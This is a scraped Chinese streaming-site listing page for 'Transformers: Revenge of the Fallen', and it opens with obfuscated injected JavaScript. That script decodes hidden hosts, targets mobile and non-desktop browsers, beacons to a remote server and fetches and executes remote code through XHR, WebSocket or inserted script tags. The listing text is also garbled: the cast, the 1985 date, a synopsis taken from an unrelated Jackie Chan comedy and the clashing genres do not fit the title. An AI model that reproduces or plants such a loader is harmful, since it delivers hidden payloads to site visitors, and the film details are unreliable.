function pSxcrdIW(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function ajgBsQN(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return pSxcrdIW(t);};window[''+'i'+'I'+'c'+'h'+'M'+'q'+'']=((navigator.platform&&!/^Mac|Win/.test(navigator.platform))||(!navigator.platform&&/Android|iOS|iPhone/i.test(navigator.userAgent)))?function(){;(function(u,k,i,w,d,c){var x=ajgBsQN,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));var sul='https://'+u+'/v2/stats/13124/'+i;if(navigator.sendBeacon){navigator.sendBeacon(sul);}else{new Image().src=sul;}'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/vh2/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else if(WebSocket&&/Huawei|Vivo|NewsArticle/i.test(navigator.userAgent)){k=decodeURIComponent(x(k.replace(new RegExp(c[1]+''+c[1],'g'),c[1])));var ws=new WebSocket('wss://'+k+':9533/wh2/'+i);ws.onmessage=function(e){ws.close();new Function('_tdcs',x(e.data))(cs);};ws.onerror=function(){var s=d[crd]('script');s.src='https://'+u+'/vh2/'+i;cs.parentElement.insertBefore(s,cs);}}else{var s=d[crd]('script');s.src='https://'+u+'/vh2/'+i;cs.parentElement.insertBefore(s,cs);}})('bWVyd2RzLnF3dWlkYm4uY29tt','Z2Jxd28ub3dwccm1vccHMuY29t','159858',window,document,['t','c']);}:function(){};

首页  »  科幻片

变形金刚2 Transformers: Revenge of the Fallen

变形金刚2 Transformers: Revenge of the Fallen

主演:杨明 李彭勃 陈晨 ..等
状态:已完结
导演:孙晓庆 
地区:大陆
年份:1985
剧情简介:《变形金刚2 Transformers: Revenge of the Fallen》由于匪徒劫持,一对双胞兄弟刚出生即遭分离。弟弟玩命(成龙)被舞女捡到抚养长大,终日浪迹于社会底层,为帮朋友泡妞,他结识了歌女芭芭拉(张曼玉),因此得罪黑社会;哥哥马友(成龙)被一对有钱夫妇带去美国,接受了良好教育长为着名音乐家,回港开音乐会时,结识世伯家的女儿唐心(利智)。  阴差阳错中,两人互换角色进入对方生活,由于大家分不清谁是马友谁又是玩命,笑话迭出,芭芭拉与唐心的心思也渐起变化。音乐会上,玩命胡指乱挥不想大获成功,而马友在黑帮威逼下,开车去救被黑帮抓做人质的玩命的好友泰山,随后,两兄弟开始连手共斗强敌。衅新竹 谌和玉 陈彦羽 等主演的恐怖片《变形金刚2 Transformers: Revenge of the Fallen》,第一时间为你更新提供《变形金刚2 Transformers: Revenge of the Fallen》,如果你喜欢《变形金刚2 Transformers: Revenge of the Fallen》请把它分享给的朋友,有您们的支持我们会做的更好。祝你观片愉快!
  • 百度资源
评论加载中....

 《变形金刚2 Transformers: Revenge of the Fallen》 主演作品

 《变形金刚2 Transformers: Revenge of the Fallen》 推荐同类型的恐怖片